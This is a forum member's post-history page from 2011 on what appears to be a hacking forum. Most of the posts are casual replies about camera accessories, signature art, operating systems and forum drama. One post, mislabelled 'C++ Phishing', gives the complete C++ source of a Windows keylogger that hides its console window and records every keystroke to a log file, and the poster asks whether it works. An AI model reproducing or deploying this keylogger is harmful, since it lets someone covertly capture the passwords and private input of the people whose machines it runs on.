Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Carnage

Pages: [1]
1
Hacking and Security / Re: C++ Phishing
« on: July 25, 2011, 08:52:15 pm »
Doesn't mean i made it XD When I'm posting something it's obviously under my name so if i get something wrong it's my mistake, or no?

2
I remember the rebellion XD logging in and being like "dah fuck". The drama with Joepie, boy oh boy was i around for a lot. Comeing back to see that we atleast this time have some settled structure is nice. I hope we keep the drama out of it this time? Ande, a question, what will you do for those Evilzone oldfags who have returned?

3
Hardware / Re: Flashlight extension for the camera
« on: July 25, 2011, 06:38:47 pm »
No problems mate =) best of luck.

4
Creative Arts / Re: Taking Requests.
« on: July 25, 2011, 06:08:24 pm »
I would like a sig if it's not to much trouble for you. Something demonic and dark with "Carnage" written across it in cool letterings =)

5
Hacking and Security / Re: C++ Phishing
« on: July 25, 2011, 05:49:20 pm »
no it isn't i just wanted to check with you guys if it works

6
Hacking and Security / C++ Phishing
« on: July 25, 2011, 05:42:43 pm »
Root Visual C++ Phishing Coding using dev c++
Let me know if I made any mistakes =)
Code: [Select]

 #include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
 
 
 

7
Hardware / Re: Flashlight extension for the camera
« on: July 25, 2011, 05:07:20 pm »
A helpful ugrade indeed, but making it ball&socket at the bottom connection would not only let you rotate it side to side but up and down aswell. Just a suggestion, but marvelous work mate.

8
Hardware / Re: Flashlight extension for the camera
« on: July 25, 2011, 04:39:44 pm »
Interesting, but wouldn't it be difficult to adjust the angle of the light to fit into the center of the camera plane?

9
Hacking and Security / Re: Linux vs windows 4 hacking
« on: July 25, 2011, 04:01:06 pm »
Linux is definately the better choice. BT5 is really all you need to jsut sit down and start working.

10
Found it on the Webs / Re: Fuck yeah.
« on: July 25, 2011, 03:51:16 pm »
That looks like it would be excrutiatingly painful to digest, if, ofcourse it doesn't try to digest you first.

Pages: [1]